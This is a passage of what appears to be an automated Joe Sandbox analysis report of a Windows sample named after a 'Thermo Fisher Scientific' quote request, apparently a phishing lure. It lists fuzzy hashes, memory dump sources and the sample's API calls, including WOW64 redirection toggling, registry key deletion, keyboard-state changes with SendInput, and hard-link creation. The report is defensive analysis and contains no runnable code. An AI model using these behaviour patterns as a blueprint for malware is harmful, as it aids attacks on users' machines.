                                                              • Opcode Fuzzy Hash: f0f5b70e9625fc880df65af405f015dac5b8bea762413aaf9b52470778c19cc9
                                                              • Instruction Fuzzy Hash: F7D0A7F4410B23AFC7215F31F82C68177DBEF04700B015419E881E2290DB70D8C08770
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,006042EC,?,006042AA,?), ref: 00604304
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00604316
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: 92b8f50d6fbf68ab9bfbb079e3fe29b8236982b9b98e7b0a0b2ffd168c81ce44
                                                              • Instruction ID: 6e366885176d537b9c553664e79565b7f5e0795c201927fbc1189916a5179bee
                                                              • Opcode Fuzzy Hash: 92b8f50d6fbf68ab9bfbb079e3fe29b8236982b9b98e7b0a0b2ffd168c81ce44
                                                              • Instruction Fuzzy Hash: C3D09EB0584713AED7285B66A80C68277D6AF14711B115519A595D22A4EAB0D8808760
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,006041BB,00604341,?,0060422F,?,006041BB,?,?,?,?,006039FE,?,00000001), ref: 00604359
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0060436B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: ae1ef8424d20b056c0cd3700554b492ecbdc6586cddd563968a7ffb12a122278
                                                              • Instruction ID: 8620e1de19f16285ab6f3e8a64c2e13251a817a5715362c2211e7096762c0e78
                                                              • Opcode Fuzzy Hash: ae1ef8424d20b056c0cd3700554b492ecbdc6586cddd563968a7ffb12a122278
                                                              • Instruction Fuzzy Hash: 78D09EB0584713AED7385B76A80868277D6AF14715B115519E5D5D2290EBB0D8808760
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0064052F,?,006406D7), ref: 00640572
                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00640584
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1587604923
                                                              • Opcode ID: bc81d7e2ea44f92ae67851ee7bce44d7951407e0806ca48bb71b42bd9cc3b26e
                                                              • Instruction ID: 5740a69e2bb85aa98c388c7fa830b723e112760a3c1d01768f73110700de8bcc
                                                              • Opcode Fuzzy Hash: bc81d7e2ea44f92ae67851ee7bce44d7951407e0806ca48bb71b42bd9cc3b26e
                                                              • Instruction Fuzzy Hash: 18D0A771450323AFD7205F30E80CB9277EAEF04700B11861DE981D2290D770C4C08B30
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,0064051D,?,006405FE), ref: 00640547
                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00640559
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                              • API String ID: 2574300362-1071820185
                                                              • Opcode ID: 53a7a9b8c981171cd28da3977c947a195c87eed175bc49dd05fed80ff33a3260
                                                              • Instruction ID: d0c3a8dae66be0632c9e370d9d3c9f07dba16a92cf14a8b5b1efd0100dfe5dd5
                                                              • Opcode Fuzzy Hash: 53a7a9b8c981171cd28da3977c947a195c87eed175bc49dd05fed80ff33a3260
                                                              • Instruction Fuzzy Hash: E3D0A770480723AFD7209F20F80C69177EAEF00701B11D81DE48AD2290D670C8C08B20
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0065ECBE,?,0065EBBB), ref: 0065ECD6
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0065ECE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                              • API String ID: 2574300362-1816364905
                                                              • Opcode ID: a593f4b7cd7f1435109052891aa04f30f1a98f254b8ecf96d88032df2bbbdcf5
                                                              • Instruction ID: 958d52a165c3164cfbfd3e99c1fe27fa335a405d6a12af4915028fe6c211ab36
                                                              • Opcode Fuzzy Hash: a593f4b7cd7f1435109052891aa04f30f1a98f254b8ecf96d88032df2bbbdcf5
                                                              • Instruction Fuzzy Hash: 4DD0A7B0400723BFCF245F61E84C68277E6AF00701F018419FCA5D2291DF74C8C48B20
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0065BAD3,00000001,0065B6EE,?,0069DC00), ref: 0065BAEB
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0065BAFD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: 2ae236d2e3a714f0b234fa0ef25497714d6c4d77736101067c4f47765b912cb3
                                                              • Instruction ID: ebff1e25239e8978b5f107187a5ef49d3014f292a5caca8e42191eaf5949d2b7
                                                              • Opcode Fuzzy Hash: 2ae236d2e3a714f0b234fa0ef25497714d6c4d77736101067c4f47765b912cb3
                                                              • Instruction Fuzzy Hash: 72D09EB0940717AED7306F66A848A9177D6AF04751F115519E89792294DBB0D884C760
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00663BD1,?,00663E06), ref: 00663BE9
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00663BFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: daa31cb546c66ca6e837fc4cb3bc7276d7e480730b11dbf642080ac759df58a1
                                                              • Instruction ID: 28d26d77bae24fa0d4591b5dbb6e4c174385c81f50ac37fa4645ea32502c5a8d
                                                              • Opcode Fuzzy Hash: daa31cb546c66ca6e837fc4cb3bc7276d7e480730b11dbf642080ac759df58a1
                                                              • Instruction Fuzzy Hash: AAD0C7F0540762AFD7205F65E80C683BBF6AF15715B115519F495E2391FBB1D4C08F60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fff21945be25e5fea7b6cdb4118b0816dc49f35c1f8632a31cb53263408647e2
                                                              • Instruction ID: f99745c9f8f662c5e492ce7e579c6713265a44610486afb1988d4e14c933d027
                                                              • Opcode Fuzzy Hash: fff21945be25e5fea7b6cdb4118b0816dc49f35c1f8632a31cb53263408647e2
                                                              • Instruction Fuzzy Hash: 3CC14D75A0021AEFDB14DF94C884AAEB7B6FF48704F144598E906EB291D7B0DE41DFA0
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0065AAB4
                                                              • CoUninitialize.OLE32 ref: 0065AABF
                                                                • Part of subcall function 00640213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0064027B
                                                              • VariantInit.OLEAUT32(?), ref: 0065AACA
                                                              • VariantClear.OLEAUT32(?), ref: 0065AD9D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: 028859b572185f21f41c4df125d0803d7eee29bd16797af586b1cdfef4030dae
                                                              • Instruction ID: da01b4f04771b90a462ace91499b4a6241716ec3fce76c35133fa418614b2c11
                                                              • Opcode Fuzzy Hash: 028859b572185f21f41c4df125d0803d7eee29bd16797af586b1cdfef4030dae
                                                              • Instruction Fuzzy Hash: 1EA18B352047019FCB54EF64C491B5AB7E6BF88311F04864DFA969B3A2CB30ED44CB9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: d66d62bf2bf59a0c3abdd4cb7225d7d7131b7e0d4c99c1c8e8b4343b657979f1
                                                              • Instruction ID: bbd54fd096d8456711586645daf9ae87793b880373b6d2cf83f52f7eb21f16af
                                                              • Opcode Fuzzy Hash: d66d62bf2bf59a0c3abdd4cb7225d7d7131b7e0d4c99c1c8e8b4343b657979f1
                                                              • Instruction Fuzzy Hash: 9451FA70A403029BEB64AF65D49166EB3E7EF45314F20981FE547C72D2DBB09881CFA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                              • String ID:
                                                              • API String ID: 3877424927-0
                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction ID: 1cb0ebd518286dab78eba65dbc017c387d8608dc14688e719c841a6f83553ed5
                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction Fuzzy Hash: C251B8B0A00B35ABDF248F69A8845AE77A7AF40320F24862DF825963D0D7799F518F44
                                                              APIs
                                                              • GetWindowRect.USER32(00BB8C68,?), ref: 0066C544
                                                              • ScreenToClient.USER32(?,00000002), ref: 0066C574
                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0066C5DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: 8cdd801d794cd479bb72d0b38d3d7c4defced51891cdacb66a70d2713a78646f
                                                              • Instruction ID: 0f58e26ba5b4536bfbe5067a7efb88ade01b831144ac58701a681afe6a2e03e7
                                                              • Opcode Fuzzy Hash: 8cdd801d794cd479bb72d0b38d3d7c4defced51891cdacb66a70d2713a78646f
                                                              • Instruction Fuzzy Hash: 7A513B75A00608AFCF10DF68C880ABE7BB6EB55320F108659F9A5DB291D770ED91CB90
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0063C462
                                                              • __itow.LIBCMT ref: 0063C49C
                                                                • Part of subcall function 0063C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0063C753
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0063C505
                                                              • __itow.LIBCMT ref: 0063C55A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 8fe8290fada21f1988d30f43e5db888bbbdfa5bb8cf3ae4935454eb574c6edef
                                                              • Instruction ID: e7ebfc4729699a4e99e58d7960112594709569451c26480a9ec1795a2fa4ab3d
                                                              • Opcode Fuzzy Hash: 8fe8290fada21f1988d30f43e5db888bbbdfa5bb8cf3ae4935454eb574c6edef
                                                              • Instruction Fuzzy Hash: B2419371600208ABDF25DF54C852BEF7BB6AF49720F000059FA05B7282DB709A558BE5
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00643966
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00643982
                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006439EF
                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00643A4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: ae09777ea7d51e7c184f24d74d50b9370f3dad9d9847a2b60d775ea7e0514c4a
                                                              • Instruction ID: 7e1643a86980ca8335e9ada9213900d35f4f4bfb63119df64b4551345047bce8
                                                              • Opcode Fuzzy Hash: ae09777ea7d51e7c184f24d74d50b9370f3dad9d9847a2b60d775ea7e0514c4a
                                                              • Instruction Fuzzy Hash: 60412670E44268AEEF208B64C816BFDBBBBAF55310F14021AF4C1963C1DBB48E85D765
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0064E742
                                                              • GetLastError.KERNEL32(?,00000000), ref: 0064E768
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0064E78D
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0064E7B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: 4f5f1545db8ce6a709669825620824235923d56001eccda19c913e3ebf3e66a7
                                                              • Instruction ID: 988a1f9c9145fc8e1fe63fc8d283e730cb0650cb4252e4e8178edc38ccf6df25
                                                              • Opcode Fuzzy Hash: 4f5f1545db8ce6a709669825620824235923d56001eccda19c913e3ebf3e66a7
                                                              • Instruction Fuzzy Hash: DB411739600610DFCF15EF55C44494EBBE7BF59720B098498E986AB3A2CB71FD40CB95
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0066B5D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 210fe0a57639488e76acc86665875841ff3542a30e6d6df54ae9838d7e15f083
                                                              • Instruction ID: 81c21b992a565c664d557875283b304784f54ee9f220982a228b8e04df0e9a0f
                                                              • Opcode Fuzzy Hash: 210fe0a57639488e76acc86665875841ff3542a30e6d6df54ae9838d7e15f083
                                                              • Instruction Fuzzy Hash: 7E31CE74641208FFEF248F19CC89FE87767EB06310F646215FA52D62E2D770A9C08B56
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 0066D807
                                                              • GetWindowRect.USER32(?,?), ref: 0066D87D
                                                              • PtInRect.USER32(?,?,0066ED5A), ref: 0066D88D
                                                              • MessageBeep.USER32(00000000), ref: 0066D8FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 872bf5ff81de83ae8f3c96a22a2ac3c2ed5974ffe731d8be46e4d1dd0ee184ae
                                                              • Instruction ID: 827e8c0796dde1367c8f241cdc328b7fe4c56f51a062b7064a0eac1d19051853
                                                              • Opcode Fuzzy Hash: 872bf5ff81de83ae8f3c96a22a2ac3c2ed5974ffe731d8be46e4d1dd0ee184ae
                                                              • Instruction Fuzzy Hash: C2415C74F00219EFCB11DF59D888EA97BB6FB46354F1882AEE4149B291D730E945CB50
                                                              APIs
                                                              • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00643AB8
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00643AD4
                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00643B34
                                                              • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00643B92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
